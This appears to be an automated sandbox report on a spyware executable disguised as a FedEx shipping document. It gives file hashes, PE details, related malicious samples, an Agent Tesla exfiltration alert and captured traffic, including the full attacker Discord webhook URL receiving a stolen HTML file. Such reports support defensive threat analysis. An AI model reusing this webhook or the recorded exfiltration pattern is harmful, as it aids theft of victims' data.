                                              Analysis ID:830454
                                              Start date and time:2023-03-20 11:50:40 +01:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 14s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:13
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample file name:FeDex_shipping_document.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@3/2@4/3
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 51
                                              • Number of non-executed functions: 3
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.10.249.147, 23.10.249.178, 93.184.221.240, 8.238.85.126, 8.241.126.121, 8.248.137.254, 67.26.75.254, 8.238.88.254
                                              • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, download.windowsupdate.com.edgesuite.net
• Not all processes were analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
11:51:45 | API Interceptor | 683x Sleep call for process: FeDex_shipping_document.exe modified
Match: 162.159.138.232
Associated Sample Name / URL | Detection | Threat Name
main.exe | malicious | Discord Token Stealer
VCO00IddkzE1Fea.exe | malicious | AgentTesla, zgRAT
PTT_PAKET#U0130N#U0130Z#U0130_TESL#U0130M_ED#U0130YOR.exe | malicious | AgentTesla, zgRAT
SecuriteInfo.com.Trojan.GenericKD.65910484.24054.13087.exe | malicious | Clipboard Hijacker, Stealerium
4wqRVHUtpe.exe | malicious | AgentTesla
TNT_Express_874993766478.exe | malicious | AgentTesla, zgRAT
DHL_STATEMENT_OF_ACCOUNT_-_1301671210.exe | malicious | AgentTesla
Order_Requirement_6000025581-Pdf.com.exe | malicious | AgentTesla
Stub.exe | malicious | Vector Stealer
IKOqEiHbs8.exe | malicious | AgentTesla, zgRAT
e0fNE6JwJu.exe | malicious | AgentTesla
New_quotation_20230203.exe | malicious | AgentTesla
PiAM13RZow.exe | malicious | AgentTesla
Awb#_8457108962.exe | malicious | AgentTesla, zgRAT
T0jjggfcjh.exe | malicious | AgentTesla
DHL_Receipt_AWB#200458029822.exe | malicious | AgentTesla
Vanta Installer.exe | malicious | Creal Stealer
DHL Express_ AWB#201045829822.exe | malicious | AgentTesla
e-dekont-20230228.exe | malicious | AgentTesla
e-dekont-20230228.exe | malicious | AgentTesla
Match: discord.com
Associated Sample Name / URL | Detection | Threat Name | Context
PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exe | malicious | Vector Stealer | 162.159.136.232
main.exe | malicious | Discord Token Stealer | 162.159.138.232
VCO00IddkzE1Fea.exe | malicious | AgentTesla, zgRAT | 162.159.137.232
Qhxujqkxtf.exe | malicious | Unknown | 162.159.137.232
e-dekont-20230316B.exe | malicious | AgentTesla | 162.159.135.232
3_Hire_Invoice_CP_March_15_2023_pdf.exe | malicious | Vector Stealer, zgRAT | 162.159.128.233
PTT_PAKET#U0130N#U0130Z#U0130_TESL#U0130M_ED#U0130YOR.exe | malicious | AgentTesla, zgRAT | 162.159.136.232
SecuriteInfo.com.Trojan.GenericKD.65910484.24054.13087.exe | malicious | Clipboard Hijacker, Stealerium | 162.159.135.232
DOC-20230315=567890987655606.exe | malicious | AgentTesla | 162.159.135.232
DISCHARGING 42,000 MT CLINKER IN BULK.PDF.js | malicious | Vector Stealer | 162.159.136.232
choo.exe | malicious | Vector Stealer | 162.159.136.232
MV_GREAT_SEA_II.js | malicious | Vector Stealer | 162.159.128.233
Quotation_10072017.pdf.exe | malicious | Vector Stealer | 162.159.128.233
FedEx_Invoice-XXXXX4210-02032023073135894221.exe | malicious | AgentTesla | 162.159.137.232
Para_Transferi_Bilgilendirmesi1.exe | malicious | AgentTesla | 162.159.136.232
c0PZAXHMCpdh5F1.exe | malicious | Clipboard Hijacker, Redline Clipper, Stealerium | 162.159.135.232
4wqRVHUtpe.exe | malicious | AgentTesla | 162.159.137.232
Para_Transferi_Bilgilendirmesi000.exe | malicious | AgentTesla | 162.159.135.232
TNT_Express_874993766478.exe | malicious | AgentTesla, zgRAT | 162.159.138.232
gunzipped.exe | malicious | AgentTesla | 162.159.136.232
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
DHL_Notification_pdf.exe | malicious | FormBook | 1.13.186.125
DHL.com.exe | malicious | Stealc, Vidar | 162.159.133.233
Leeds_V10185807.html | malicious | HTMLPhisher | 104.17.24.14
Weekly CashFlow WC 20 Mar 2023.html | malicious | HTMLPhisher | 104.17.24.14
Colt Technology Services 401K Increased Contribution Statement Payments.htm | malicious | HTMLPhisher | 104.17.25.14
PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exe | malicious | Vector Stealer | 162.159.136.232
SC.028UCCP.exe | malicious | FormBook, GuLoader | 104.21.39.114
#U8be2#U4ef7.pdf.exe | malicious | FormBook | 172.67.145.161
https://lp.constantcontactpages.com/cu/YWZoQqo | malicious | HTMLPhisher | 104.17.25.14
http://awfonts.com | malicious | Unknown | 172.67.220.229
http://vovysjdjs763f3ba539c0dd.opticair.ru | malicious | Unknown | 104.16.123.96
https://lp.constantcontactpages.com/cu/YWZoQqo | malicious | HTMLPhisher | 104.17.25.14
https://ipfs.io/ipfs/bafybeieqwjihauwgqt7xc6em5fjahc6wprftgeacb4ba3nfn6hk5c5lgky/chenjeffente_cham_ev14.html#for.transition.support@casa.gov.au | malicious | Unknown | 104.17.25.14
https://jtouch.co.ke/ | malicious | Unknown | 188.114.96.3
http://sengsipnem.web.app/yuxuba-%E6%8A%98%E3%82%8A%E7%B4%99-%E3%83%90%E3%83%83%E3%82%BF-%E6%8A%98%E3%82%8A%E6%96%B9.html | malicious | Unknown | 104.21.72.125
oXMenI45tQ.exe | malicious | FormBook | 172.67.156.58
https://rheba218.softr.app/ | malicious | HTMLPhisher | 104.18.6.185
http://oceanhero.cc | malicious | Unknown | 188.114.96.3
OYm3R777Yb.exe | malicious | Amadey, Babuk, Djvu, Fabookie, Raccoon Stealer v2, RedLine, SmokeLoader | 188.114.96.3
gbK76vpcp8.exe | malicious | Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar | 188.114.96.3
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
DHL_Shipping_Document2.exe | malicious | AgentTesla, zgRAT | 162.159.138.232, 64.185.227.155
PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exe | malicious | Vector Stealer | 162.159.138.232, 64.185.227.155
PO2023#PREORDER.PDF.exe | malicious | AgentTesla | 162.159.138.232, 64.185.227.155
PO_340166.exe | malicious | AgentTesla | 162.159.138.232, 64.185.227.155
PO_IN34023.exe | malicious | AgentTesla, zgRAT | 162.159.138.232, 64.185.227.155
2303-64687.exe | malicious | AgentTesla | 162.159.138.232, 64.185.227.155
Product_specifications.exe | malicious | AgentTesla | 162.159.138.232, 64.185.227.155
REQUEST_FOR_QUOTE_1603023.exe | malicious | AgentTesla, zgRAT | 162.159.138.232, 64.185.227.155
eRPRiQhQEI.exe | malicious | AgentTesla | 162.159.138.232, 64.185.227.155
INV_SOA.exe | malicious | AgentTesla | 162.159.138.232, 64.185.227.155
IMG_6071220733pdf.exe | malicious | AgentTesla | 162.159.138.232, 64.185.227.155
yeni_sipari#U015f.exe | malicious | AgentTesla | 162.159.138.232, 64.185.227.155
yeni_sipari#U015f.exe | malicious | AgentTesla | 162.159.138.232, 64.185.227.155
DHL_AWB_copy_&_draft_COO.exe | malicious | AgentTesla | 162.159.138.232, 64.185.227.155
bgfbv.exe | malicious | Xmrig | 162.159.138.232, 64.185.227.155
setup.exe | malicious | Xmrig | 162.159.138.232, 64.185.227.155
FixDefError.exe | malicious | Xmrig | 162.159.138.232, 64.185.227.155
0E0BD47371B5E50FC51F147DC456949F8DB70EC27B644.exe | malicious | RedLine | 162.159.138.232, 64.185.227.155
setup.exe | malicious | Xmrig | 162.159.138.232, 64.185.227.155
315B63093AE9218EBDEAEB5120E17D7FA81BC7BAE694F.exe | malicious | RedLine | 162.159.138.232, 64.185.227.155
                                                                                      No context
                                                                                      Process:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1216
                                                                                      Entropy (8bit):5.355304211458859
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                      Malicious:true
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                      Process:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):0.4393511334109407
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                                                                      MD5:8C31C5487A97BBE73711C5E20600C1F6
                                                                                      SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                                                                      SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                                                                      SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.864054907684923
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:FeDex_shipping_document.exe
                                                                                      File size:746496
                                                                                      MD5:5cf87a160007a5e6c7a4d24e1d831327
                                                                                      SHA1:e11d7467bc961d5ff16c3541200be1ad5083cefa
                                                                                      SHA256:91e74ee16f6229b18ef4f973494b8ec68bad3420e90fd3f1ee6d835048421fcf
                                                                                      SHA512:c11e2c571817ac519ef89019529171d64e9f3faa17a2ccd51a55770113eff83e27f3a53133cec3daa096f989fafedd378e759cc4030b83489ebccbd7aa425237
                                                                                      SSDEEP:12288:EDBmYMUnFW/NMbbjHAaBvaDzGkSjT+vbuxiZQ7GiPLbk6jdoVx2ye6yb:EDBUibAXPGD+zKiri/kCGVYye6q
                                                                                      TLSH:66F402342FEA6239F57657BDD9E43295236E77B22703D95E04B121CA4B63B028DC092F
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d..............0..N..........Rm... ........@.. ....................................@................................
                                                                                      Icon Hash:209480e66eb84902
                                                                                      Entrypoint:0x4b6d52
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6417BCAC [Mon Mar 20 01:53:48 2023 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb6cfd | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb8000 | 0x1110 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb58e8 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb4d58 | 0xb4e00 | False | 0.9268084290774016 | data | 7.872797130775443 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb8000 | 0x1110 | 0x1200 | False | 0.73046875 | data | 6.631473125860904 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xba000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0xb8100 | 0xa79 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_GROUP_ICON | 0xb8b8c | 0x14 | data | |
RT_VERSION | 0xb8bb0 | 0x360 | data | |
RT_MANIFEST | 0xb8f20 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/20/23-11:52:05.074477 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49701 | 443 | 192.168.2.7 | 162.159.138.232
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 11:51:49.157324076 CET | 49700 | 443 | 192.168.2.7 | 64.185.227.155
Mar 20, 2023 11:51:49.157382011 CET | 443 | 49700 | 64.185.227.155 | 192.168.2.7
Mar 20, 2023 11:51:49.157479048 CET | 49700 | 443 | 192.168.2.7 | 64.185.227.155
Mar 20, 2023 11:51:49.196374893 CET | 49700 | 443 | 192.168.2.7 | 64.185.227.155
Mar 20, 2023 11:51:49.196409941 CET | 443 | 49700 | 64.185.227.155 | 192.168.2.7
Mar 20, 2023 11:51:57.077124119 CET | 443 | 49700 | 64.185.227.155 | 192.168.2.7
Mar 20, 2023 11:51:57.077359915 CET | 49700 | 443 | 192.168.2.7 | 64.185.227.155
Mar 20, 2023 11:51:57.808013916 CET | 49700 | 443 | 192.168.2.7 | 64.185.227.155
Mar 20, 2023 11:51:57.808080912 CET | 443 | 49700 | 64.185.227.155 | 192.168.2.7
Mar 20, 2023 11:51:57.808967113 CET | 443 | 49700 | 64.185.227.155 | 192.168.2.7
Mar 20, 2023 11:51:57.874470949 CET | 49700 | 443 | 192.168.2.7 | 64.185.227.155
Mar 20, 2023 11:51:58.269769907 CET | 49700 | 443 | 192.168.2.7 | 64.185.227.155
Mar 20, 2023 11:51:58.269812107 CET | 443 | 49700 | 64.185.227.155 | 192.168.2.7
Mar 20, 2023 11:51:59.014796972 CET | 49700 | 443 | 192.168.2.7 | 64.185.227.155
Mar 20, 2023 11:51:59.014924049 CET | 443 | 49700 | 64.185.227.155 | 192.168.2.7
Mar 20, 2023 11:51:59.014995098 CET | 49700 | 443 | 192.168.2.7 | 64.185.227.155
Mar 20, 2023 11:52:04.950087070 CET | 49701 | 443 | 192.168.2.7 | 162.159.138.232
Mar 20, 2023 11:52:04.950215101 CET | 443 | 49701 | 162.159.138.232 | 192.168.2.7
Mar 20, 2023 11:52:04.950337887 CET | 49701 | 443 | 192.168.2.7 | 162.159.138.232
Mar 20, 2023 11:52:04.952203989 CET | 49701 | 443 | 192.168.2.7 | 162.159.138.232
Mar 20, 2023 11:52:04.952301979 CET | 443 | 49701 | 162.159.138.232 | 192.168.2.7
Mar 20, 2023 11:52:05.009949923 CET | 443 | 49701 | 162.159.138.232 | 192.168.2.7
Mar 20, 2023 11:52:05.010083914 CET | 49701 | 443 | 192.168.2.7 | 162.159.138.232
Mar 20, 2023 11:52:05.014666080 CET | 49701 | 443 | 192.168.2.7 | 162.159.138.232
Mar 20, 2023 11:52:05.014695883 CET | 443 | 49701 | 162.159.138.232 | 192.168.2.7
Mar 20, 2023 11:52:05.015054941 CET | 443 | 49701 | 162.159.138.232 | 192.168.2.7
Mar 20, 2023 11:52:05.018209934 CET | 49701 | 443 | 192.168.2.7 | 162.159.138.232
Mar 20, 2023 11:52:05.018237114 CET | 443 | 49701 | 162.159.138.232 | 192.168.2.7
Mar 20, 2023 11:52:05.073689938 CET | 443 | 49701 | 162.159.138.232 | 192.168.2.7
Mar 20, 2023 11:52:05.074287891 CET | 49701 | 443 | 192.168.2.7 | 162.159.138.232
Mar 20, 2023 11:52:05.074341059 CET | 443 | 49701 | 162.159.138.232 | 192.168.2.7
Mar 20, 2023 11:52:05.421833992 CET | 443 | 49701 | 162.159.138.232 | 192.168.2.7
Mar 20, 2023 11:52:05.422219038 CET | 443 | 49701 | 162.159.138.232 | 192.168.2.7
Mar 20, 2023 11:52:05.422296047 CET | 49701 | 443 | 192.168.2.7 | 162.159.138.232
Mar 20, 2023 11:52:05.424500942 CET | 49701 | 443 | 192.168.2.7 | 162.159.138.232
Mar 20, 2023 11:52:06.002155066 CET | 49702 | 443 | 192.168.2.7 | 162.159.135.232
Mar 20, 2023 11:52:06.002207994 CET | 443 | 49702 | 162.159.135.232 | 192.168.2.7
Mar 20, 2023 11:52:06.002302885 CET | 49702 | 443 | 192.168.2.7 | 162.159.135.232
Mar 20, 2023 11:52:06.003519058 CET | 49702 | 443 | 192.168.2.7 | 162.159.135.232
Mar 20, 2023 11:52:06.003566027 CET | 443 | 49702 | 162.159.135.232 | 192.168.2.7
Mar 20, 2023 11:52:06.051467896 CET | 443 | 49702 | 162.159.135.232 | 192.168.2.7
Mar 20, 2023 11:52:06.055735111 CET | 49702 | 443 | 192.168.2.7 | 162.159.135.232
Mar 20, 2023 11:52:06.055769920 CET | 443 | 49702 | 162.159.135.232 | 192.168.2.7
Mar 20, 2023 11:52:06.124003887 CET | 443 | 49702 | 162.159.135.232 | 192.168.2.7
Mar 20, 2023 11:52:06.124957085 CET | 49702 | 443 | 192.168.2.7 | 162.159.135.232
Mar 20, 2023 11:52:06.125015020 CET | 443 | 49702 | 162.159.135.232 | 192.168.2.7
Mar 20, 2023 11:52:06.437938929 CET | 443 | 49702 | 162.159.135.232 | 192.168.2.7
Mar 20, 2023 11:52:06.438318968 CET | 443 | 49702 | 162.159.135.232 | 192.168.2.7
Mar 20, 2023 11:52:06.438410997 CET | 49702 | 443 | 192.168.2.7 | 162.159.135.232
Mar 20, 2023 11:52:06.440745115 CET | 49702 | 443 | 192.168.2.7 | 162.159.135.232
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 11:51:49.083699942 CET | 59477 | 53 | 192.168.2.7 | 8.8.8.8
Mar 20, 2023 11:51:49.103337049 CET | 53 | 59477 | 8.8.8.8 | 192.168.2.7
Mar 20, 2023 11:51:49.115154028 CET | 55752 | 53 | 192.168.2.7 | 8.8.8.8
Mar 20, 2023 11:51:49.135409117 CET | 53 | 55752 | 8.8.8.8 | 192.168.2.7
Mar 20, 2023 11:52:04.919559956 CET | 50330 | 53 | 192.168.2.7 | 8.8.8.8
Mar 20, 2023 11:52:04.941693068 CET | 53 | 50330 | 8.8.8.8 | 192.168.2.7
Mar 20, 2023 11:52:05.979279041 CET | 56588 | 53 | 192.168.2.7 | 8.8.8.8
Mar 20, 2023 11:52:06.000864029 CET | 53 | 56588 | 8.8.8.8 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 20, 2023 11:51:49.083699942 CET | 192.168.2.7 | 8.8.8.8 | 0xd371 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:51:49.115154028 CET | 192.168.2.7 | 8.8.8.8 | 0x7dd7 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:52:04.919559956 CET | 192.168.2.7 | 8.8.8.8 | 0x8554 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:52:05.979279041 CET | 192.168.2.7 | 8.8.8.8 | 0xf5ae | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 11:51:49.103337049 CET | 8.8.8.8 | 192.168.2.7 | 0xd371 | No error (0) | api.ipify.org | api4.ipify.org |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 11:51:49.103337049 CET | 8.8.8.8 | 192.168.2.7 | 0xd371 | No error (0) | api4.ipify.org |  | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:51:49.103337049 CET | 8.8.8.8 | 192.168.2.7 | 0xd371 | No error (0) | api4.ipify.org |  | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:51:49.103337049 CET | 8.8.8.8 | 192.168.2.7 | 0xd371 | No error (0) | api4.ipify.org |  | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:51:49.135409117 CET | 8.8.8.8 | 192.168.2.7 | 0x7dd7 | No error (0) | api.ipify.org | api4.ipify.org |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 11:51:49.135409117 CET | 8.8.8.8 | 192.168.2.7 | 0x7dd7 | No error (0) | api4.ipify.org |  | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:51:49.135409117 CET | 8.8.8.8 | 192.168.2.7 | 0x7dd7 | No error (0) | api4.ipify.org |  | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:51:49.135409117 CET | 8.8.8.8 | 192.168.2.7 | 0x7dd7 | No error (0) | api4.ipify.org |  | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:52:04.941693068 CET | 8.8.8.8 | 192.168.2.7 | 0x8554 | No error (0) | discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:52:04.941693068 CET | 8.8.8.8 | 192.168.2.7 | 0x8554 | No error (0) | discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:52:04.941693068 CET | 8.8.8.8 | 192.168.2.7 | 0x8554 | No error (0) | discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:52:04.941693068 CET | 8.8.8.8 | 192.168.2.7 | 0x8554 | No error (0) | discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:52:04.941693068 CET | 8.8.8.8 | 192.168.2.7 | 0x8554 | No error (0) | discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:52:06.000864029 CET | 8.8.8.8 | 192.168.2.7 | 0xf5ae | No error (0) | discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:52:06.000864029 CET | 8.8.8.8 | 192.168.2.7 | 0xf5ae | No error (0) | discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:52:06.000864029 CET | 8.8.8.8 | 192.168.2.7 | 0xf5ae | No error (0) | discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:52:06.000864029 CET | 8.8.8.8 | 192.168.2.7 | 0xf5ae | No error (0) | discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 11:52:06.000864029 CET | 8.8.8.8 | 192.168.2.7 | 0xf5ae | No error (0) | discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
                                                                                      • api.ipify.org
                                                                                      • discord.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49700 | 64.185.227.155 | 443 | C:\Users\user\Desktop\FeDex_shipping_document.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 10:51:58 UTC | 0 | OUT | GET / HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                      Host: api.ipify.org
                                                                                      Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49701 | 162.159.138.232 | 443 | C:\Users\user\Desktop\FeDex_shipping_document.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 10:52:05 UTC | 0 | OUT | POST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----------f62e205f82fd40c8a956e69d1bcde1ed
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                      Host: discord.com
                                                                                      Content-Length: 1217
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
2023-03-20 10:52:05 UTC | 0 | IN | HTTP/1.1 100 Continue
2023-03-20 10:52:05 UTC | 0 | OUT | Data Raw: (hex dump omitted; the decoded form follows)
                                                                                      Data Ascii: ------------f62e205f82fd40c8a956e69d1bcde1edContent-Disposition: form-data; name="filename"user-128757 2023-03-20 20-11-13.html------------f62e205f82fd40c8a956e69d1bcde1edContent-Disposition: form-data; name="fileformat"html----------
2023-03-20 10:52:05 UTC | 1 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 20 Mar 2023 10:52:05 GMT
